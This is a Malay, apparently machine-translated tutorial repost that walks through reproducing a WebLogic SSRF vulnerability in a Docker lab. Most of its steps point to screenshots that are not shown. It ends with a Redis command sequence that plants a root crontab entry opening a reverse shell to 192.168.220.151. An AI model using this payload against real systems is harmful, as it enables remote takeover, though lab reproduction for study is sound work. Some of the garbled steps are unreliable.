Rumah > Artikel > Operasi dan penyelenggaraan > Cara Menghasilkan Semula Kerentanan SSRF Weblogic

Cara Menghasilkan Semula Kerentanan SSRF Weblogic

王林ke hadapan: 2023-05-14 20:04:041342semak imbas

1. Gunakan docker untuk membina persekitaran

Pemasangan docker dan tutorial membina persekitaran: https://www.freebuf.com/sectool/252257.html

如何实现Weblogic SSRF漏洞复现

Akses port 7001 如何实现Weblogic SSRF漏洞复现

2. Langkah-langkah Pengeluaran Semula Kerentanan

1.

2. Semak tempat IBM

如何实现Weblogic SSRF漏洞复现

dan dapatkan bahawa ia adalah sambungan, yang bermaksud mungkin terdapat ssrf

如何实现Weblogic SSRF漏洞复现 3 tangkap paket. Klik Cari

如何实现Weblogic SSRF漏洞复现

4 Ubah suai sambungan parameter operator

如何实现Weblogic SSRF漏洞复现

<.>5. Hasil capaian

Mengakses pengembalian port yang tidak wujud tidak dapat disambungkan melalui HTTP 如何实现Weblogic SSRF漏洞复现

Mengakses port sedia ada mengembalikan kod status

如何实现Weblogic SSRF漏洞复现

Akses intranet

如何实现Weblogic SSRF漏洞复现

Gunakan redis untuk melantunkan muatan shell

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

Atas ialah kandungan terperinci Cara Menghasilkan Semula Kerentanan SSRF Weblogic. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!

Kenyataan：

Artikel ini dikembalikan pada:yisu.com. Jika ada pelanggaran, sila hubungi admin@php.cn Padam

Artikel sebelumnya：Bagaimana untuk melaksanakan tatasusunan dipetakan tanpa map() dalam JavascriptArtikel seterusnya：Bagaimana untuk melaksanakan tatasusunan dipetakan tanpa map() dalam Javascript

Artikel berkaitan

Lihat lagi